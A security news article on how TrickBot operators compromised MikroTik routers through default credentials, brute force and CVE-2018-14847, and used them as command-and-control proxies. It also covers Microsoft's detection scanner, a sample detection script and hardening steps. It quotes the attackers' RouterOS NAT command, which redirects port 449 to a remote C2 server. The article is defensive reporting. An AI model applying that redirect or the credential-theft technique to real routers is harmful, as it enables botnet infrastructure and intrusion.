The TrickBot gang hacked MikroTik routers to operate as proxies for command-and-control servers, and Microsoft created a scanner to detect them. TrickBot is a malware botnet that spreads through phishing emails and other malware that has already infected a device. TrickBot will connect to a remote command and control server once it has been executed, receiving orders and downloading further payloads to run on the infected system.
TrickBot has for years used IoT devices, such as routers, as proxies between infected devices and its command and control (C2) servers. These proxies make it harder for law enforcement and researchers to discover and take down the C2 infrastructure. In a new report, Microsoft researchers describe the several approaches the TrickBot gang used to enlist vulnerable MikroTik routers as proxies for C2 communications.
To break into MikroTik routers, the TrickBot operators tried default credentials first and then brute-forced the password. If these techniques failed, they tried to exploit CVE-2018-14847, a serious directory traversal vulnerability that allows unauthenticated, remote attackers to read arbitrary files. Threat actors could leverage this flaw to steal the ‘user.dat’ file, which holds the router’s user credentials.
Once they had access to the device, the threat actors used the built-in ‘/ip’, ‘/system’ and ‘/tool’ commands to set a network address translation (NAT) rule that redirected traffic sent to port 449 on the router to port 80 on a remote command and control server.
/ip firewall nat add chain=dstnat proto=tcp dst-port=449 to-port=80 action=dst-nat to-addresses=[infected device] dst-address=[real C2 address]
Because of this NAT rule, the C2 servers are never exposed directly to threat analysis, yet compromised devices can still reach them. As Microsoft points out, the actors appear to have a thorough understanding of the restricted capabilities of the Linux-based OS on MikroTik devices, as seen in their use of bespoke SSH commands.
According to an Eclypsium report released last December, thousands of MikroTik routers remain vulnerable to malware botnets, years after the vendor warned of significant weaknesses. Malicious actors, particularly those interested in resource-intensive activities such as DDoS attacks, consider these devices high-value targets because of their powerful hardware.
Although security fixes have been available for years, many devices are still open to botnet recruitment through unauthenticated remote-access and code-execution flaws. MikroTik device owners have been advised to update to RouterOS versions newer than 6.45.6 and to avoid exposing the WinBox protocol.
“This analysis highlights the importance of keeping IoT devices secure in today’s ever evolving threat environment,” Microsoft warns in their report.
Network administrators can now use Microsoft’s forensics tool ‘routeros-scanner’ to check MikroTik devices for indicators of TrickBot infection. The script looks for the following on MikroTik devices:
- Get the version of the device and map it to CVEs
- Check for scheduled tasks
- Look for traffic redirection rules
- Look for DNS cache poisoning
- Look for changes to default ports
- Look for non-default users
- Look for suspicious files
- Look for proxy, socks, and FW rules
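As an added illustration of the traffic-redirection check (this is example code written for this article, not Microsoft’s routeros-scanner), the following script parses constructed ‘/ip firewall nat print detail’ style output and flags dst-nat rules that forward traffic to an address outside the local network, such as the port 449 to port 80 redirect described above. The LAN range and the sample rules are assumptions.

```python
import ipaddress
import re

# Constructed sample in the key=value style of `/ip firewall nat print detail`.
# Rule 2 mirrors the TrickBot pattern: port 449 redirected to port 80 on an
# address that is not on the LAN (203.0.113.77 is a documentation address).
SAMPLE_NAT_RULES = """\
 0   chain=srcnat action=masquerade out-interface=ether1
 1   chain=dstnat action=dst-nat to-addresses=192.168.88.10 to-ports=443 protocol=tcp dst-port=443
 2   chain=dstnat action=dst-nat to-addresses=203.0.113.77 to-ports=80 protocol=tcp dst-port=449
"""

KV_RE = re.compile(r"(\S+?)=(\S+)")


def parse_rules(text):
    """Turn numbered RouterOS rule lines into dicts of their key=value fields."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or not line[0].isdigit():
            continue  # skip blank lines and the column header
        num, _, rest = line.partition(" ")
        rule = dict(KV_RE.findall(rest))  # flags such as "X" carry no "=" and are dropped
        rule["id"] = int(num)
        rules.append(rule)
    return rules


def suspicious_redirects(text, lan_networks=("192.168.88.0/24",)):
    """Return (rule id, target, dst-port, to-port) for dst-nat rules aimed off the LAN."""
    lan = [ipaddress.ip_network(n) for n in lan_networks]  # assumed LAN range
    findings = []
    for rule in parse_rules(text):
        if rule.get("chain") != "dstnat" or rule.get("action") != "dst-nat":
            continue
        target = rule.get("to-addresses")
        if not target:
            continue
        try:
            addr = ipaddress.ip_address(target.split("-")[0])  # first address of a range
        except ValueError:
            continue  # non-IP target (e.g. an interface name); not judged here
        if not any(addr in net for net in lan):
            to_port = rule.get("to-ports") or rule.get("to-port")
            findings.append((rule["id"], target, rule.get("dst-port"), to_port))
    return findings


if __name__ == "__main__":
    for rule_id, target, dst_port, to_port in suspicious_redirects(SAMPLE_NAT_RULES):
        print(f"rule {rule_id}: dst-port {dst_port} -> {target}:{to_port} (off-LAN redirect)")
```

A hit is a lead, not proof: legitimate port forwards to external hosts exist, so compare any flagged rule against the device’s change history before acting.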
To further harden MikroTik devices, Microsoft advises the following steps:
- Change the default password to something more secure.
- Block port 8291 from external access.
- Change the SSH port to something other than the default (22).
- Ensure that your routers have the most recent firmware and fixes.
- For remote access, use a secure virtual private network (VPN) service and limit remote access to the router.
Because TrickBot has been disrupted and relaunched before, the threat actors may revive the operation in the future. It is therefore critical to ensure that devices are adequately protected so they cannot be exploited in future campaigns or by other malware groups. Meanwhile, if you own a MikroTik device, you should run Microsoft’s infection scanner: the shutdown does not undo the malicious commands, and they could be re-activated later.